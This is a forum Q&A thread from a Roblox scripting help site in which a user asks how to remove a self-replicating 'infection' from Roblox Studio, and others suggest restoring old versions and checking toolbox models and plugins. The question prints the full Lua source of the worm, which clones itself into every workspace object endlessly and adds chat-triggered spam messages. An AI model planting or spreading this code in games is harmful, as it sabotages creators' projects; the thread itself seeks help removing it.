Scripting Helpers is winding down operations and is now read-only. More info→
Ad
Log in to vote
0

Can someone please help me fix this Infection in Studio?

Asked by 9 years ago

I have an infection that if its in pause mode and I delete it, hundreds more generate but when I go Test>Start There is 4JAMDUDE4 and Player in Terrain, Player and benjonas2 in Camera and player and MightyCHILI in Baseplate, so 2 in each and when I delete them those same 2 re appear and they each have a script called [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]] in them and this is it. Can someone please help me delete these? It does it to all my games and every account I use even in a game with no models or bricks at all.

names={"benjonas2", "michael1784", "mightyCHILI", "4JAMDUDE4"}
local NameCheck = false
script.Parent.Name = names[math.random(1, #names)]
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
local c = script.Parent:Clone()

function addEvent(ch)
    wait(math.random())
    NameCheck = false
    for ss = 1, #names do
        if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
            NameCheck = true
        end
    end
    if NameCheck == false then
        local cloak = c:Clone()
        cloak.Name = ""
        cloak:GetChildren()[1].Name = ""
        cloak.Parent = ch
        cloak.Name = names[math.random(1, 5)]
    end
end

workspace.ChildAdded:connect(addEvent)

game.Players.PlayerAdded:connect(function(pl)
    pl.Chatted:connect(function(m)
        if m:sub(1, 5) == "/sc t" then
            local m = Instance.new("Message")
            m.Parent = workspace
            m.Text = "THEY CALL ME CRAZY"
            wait(1)
            m.Text = "Get some"
            wait(0.25)
            m.Text = "LoOoOoOoP"
            wait(0.25)
            m.Text = "lOoOoOoOp"
            wait(0.25)
            m.Text = "LoOoOoOoP"
            wait(0.25)
            m.Text = "lOoOoOoOp"
            wait(0.25)
            m.Text = "LoOoOoOoP"
            wait(0.25)
            m.Text = "GOTTA GOTTA BE CRAZY"
            wait(1)
            m.Text = "lOoOoOoOp"
            wait(0.25)
            m.Text = "LoOoOoOoP"
            wait(0.25)
            m.Text = "lOoOoOoOp"
            wait(0.25)
            m.Text = "LoOoOoOoP"
            wait(0.25)
            m.Text = "lOoOoOoOp"
            wait(0.25)
            m.Text = "LoOoOoOoP"
            wait(0.25)
            m.Text = "GOTTA GET A LIFE (YOU)"
            wait(3)
            m:remove()
        end
        if m:sub(1, 5) == "HAAXX" then
            local m = Instance.new("Message")
            m.Parent = workspace
            m.Text = "HAAXX"    
            wait(3)
            m:remove()
        end
    end)
end)

while true do
    local s = workspace:GetChildren()
    for i = 1, #s do
        NameCheck = false
        for ss = 1, #names do
            if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
                NameCheck = true
            end
        end
        if NameCheck == false then
            local cloak = c:Clone()
            cloak.Name = ""
            cloak:GetChildren()[1].Name = ""
            cloak.Parent = s[i]
        end
        wait(0.1)
    end
    wait(1)
end

1
Maybe it came out from a Virus Plugin. woodengop 1134 — 9y

1 answer

Log in to vote
0
Answered by 9 years ago

Have you tried to restore your game to an earlier version? If you have not you could restore it in Studio Mode. Otherwise you may have to comb threw the entire children of your workspace. Be sure to check every block and every script. This is usually caused by using Models from the tool box. I would recommend searching the entire contents of the models before you place them or even test to see it they work. I also open a new Studio Place to test or check the models before I place them into my active game im working on.

0
It does it on all my places and this place has no bricks at all omarz123 5 — 9y
0
Have you used models on all your places? This seems like it could be likely that its an object your character is wearing or possibly a model that you have saved to your inventory. Im sorry i would almost have to see it to find the problem. If worse comes to worse you could uninstall studio mode completely and re install brooksdart 5 — 9y
0
I tried re-installing it but I did use models in my other games but I know what game it came from, I deleted the model but this won't go away omarz123 5 — 9y
0
You may still need to reset your game to an earlier version still yet. Go to Studio mode and go to my places and configure then look for an better version. You may want to just delete the game and restart. Thats why i hate using models from the tool box. brooksdart 5 — 9y
View all comments (3 more)
0
Maybe it came out from a Virus Plugin. TheContinentofEurope 13 — 12m did you check your plugins? brooksdart 5 — 9y
0
THANK YOU SO MUCH BROOKSDART!!!! omarz123 5 — 9y
0
ha ha no problem :) brooksdart 5 — 9y
Ad

Answer this question